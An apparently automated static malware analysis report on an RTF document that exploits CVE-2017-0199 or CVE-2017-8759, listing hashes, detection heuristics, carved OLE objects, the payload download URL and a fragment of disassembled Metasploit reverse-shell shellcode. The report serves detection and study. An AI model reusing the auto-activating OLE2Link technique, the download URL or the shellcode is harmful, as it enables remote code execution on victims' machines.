Malicious RTF — malware analysis report

Static analysis result for SHA-256 08ac832caf0a1ea6…

MALICIOUS

RTF

779.4 KB Created: 2017-11-20 19:24:00 First seen: 2017-12-08
MD5: d7993336e0a397aabf3cabb8bbec800b SHA-1: ccdde5b185fb850e873d7d7116e625b5aebf8436 SHA-256: 08ac832caf0a1ea6b73f27d62ab4dcdbbad882b659869f2814f837c73c9e4ac0
402 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The RTF file contains OLE object data that triggers remote content loading, specifically exploiting CVE-2017-0199 or CVE-2017-8759. This mechanism is designed to download and execute a secondary payload from the URL http://kinesk.com/t/t.php?stats=send&thread=2. Metasploit reverse shellcode was also detected, indicating the likely intent to establish a reverse shell connection.

Heuristics 11

  • CVE-2017-0199 / CVE-2017-8759 (OLE2Link auto-activated remote loader) critical CVE related RTF_OLE2LINK_REMOTE_MONIKER_LOADER
    RTF embeds an OLE2Link object that is force-activated with \objupdate (no user interaction on open) and fetches a remote second stage through an INCLUDETEXT/INCLUDEPICTURE field. This is the field-delivered OLE2Link auto-update attack path shared by CVE-2017-0199 (server returns an HTA/scriptlet) and CVE-2017-8759 (server returns a SOAP WSDL the .NET parser compiles). Office processes the fetched response through the same code path; the specific CVE depends on the now-unreachable server content type.
  • ClamAV: Rtf.Downloader.CVE_2017-6336326-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Rtf.Downloader.CVE_2017-6336326-3
  • Metasploit reverse_tcp shellcode critical SC_MSF_REVERSE
    Metasploit reverse_tcp shellcode
    Disassembly
    Attempted x86 opcode disassembly
    00066CE3  fc                cld
00066CE4  e882000000        call 0x66d6b
00066CE9  5f                pop edi
00066CEA  5e                pop esi
00066CEB  5b                pop ebx
00066CEC  8be5              mov esp, ebp
00066CEE  5d                pop ebp
00066CEF  c3                ret
00066CF0  8d4000            lea eax, [eax]
00066CF3  53                push ebx
00066CF4  56                push esi
00066CF5  8bd8              mov ebx, eax
00066CF7  3b5324            cmp edx, dword ptr [ebx + 0x24]
00066CFA  7436              je 0x66d32
00066CFC  8bf2              mov esi, edx
00066CFE  85f6              test esi, esi
00066D00  7518              jne 0x66d1a
00066D02  33c0              xor eax, eax
00066D04  8a4318            mov al, byte ptr [ebx + 0x18]
00066D07  8b048594cd4600    mov eax, dword ptr [eax*4 + 0x46cd94]
00066D0E  50                push eax
00066D0F  a138374700        mov eax, dword ptr [0x473738]
00066D14  8b00              mov eax, dword ptr [eax]
00066D16  ffd0              call eax
00066D18  8bd0              mov edx, eax
00066D1A  895324            mov dword ptr [ebx + 0x24], edx
00066D1D  c6434401          mov byte ptr [ebx + 0x44], 1
00066D21  8b4304            mov eax, dword ptr [ebx + 4]
00066D24  e8ba060000        call 0x673e3
00066D29  85f6              test esi, esi
00066D2B  7505              jne 0x66d32
00066D2D  33c0              xor eax, eax
00066D2F  894324            mov dword ptr [ebx + 0x24], eax
00066D32  5e                pop esi
00066D33  5b                pop ebx
00066D34  c3                ret
00066D35  8bc0              mov eax, eax
00066D37  3b5028            cmp edx, dword ptr [eax + 0x28]
00066D3A  7413              je 0x66d4f
00066D3C  895028            mov dword ptr [eax + 0x28], edx
00066D3F  c6402c00          mov byte ptr [eax + 0x2c], 0
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • \objupdate forces OLE activation high RTF_OBJUPDATE
    RTF contains \objupdate — forces automatic OLE object instantiation when the document is opened, bypassing user interaction. Almost exclusively seen in Equation Editor exploit documents.
  • INCLUDETEXT/INCLUDEPICTURE remote URL high RTF_INCLUDE_REMOTE
    RTF document uses INCLUDETEXT or INCLUDEPICTURE with an http:// URL — Word can fetch the remote content on open depending on Office version and external-content settings, enabling remote template injection, NTLM capture via redirects, or payload delivery
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API
  • OLE object data medium RTF_OBJDATA
    RTF contains 2 \objdata section(s) — embedded OLE objects
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://kinesk.com/t/t.php?stats=send&thread=2 In RTF body

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
objdata_00_off0000c568.bin rtf-objdata-decoded RTF \objdata at offset 0xC568 2598 bytes
SHA-256: 831d653a8bf6b35f70c34b8f0aa9b4deff313b9e99f06c2a160f156cfbe686ed
objdata_01_off0000dc96.bin rtf-objdata-decoded RTF \objdata at offset 0xDC96 2674 bytes
SHA-256: b2d1dcd53ab72d489708eb5449a9c003c690279daf375b527c7e12791399d9fe

Open this report in the interactive analyzer, or submit your own file for analysis.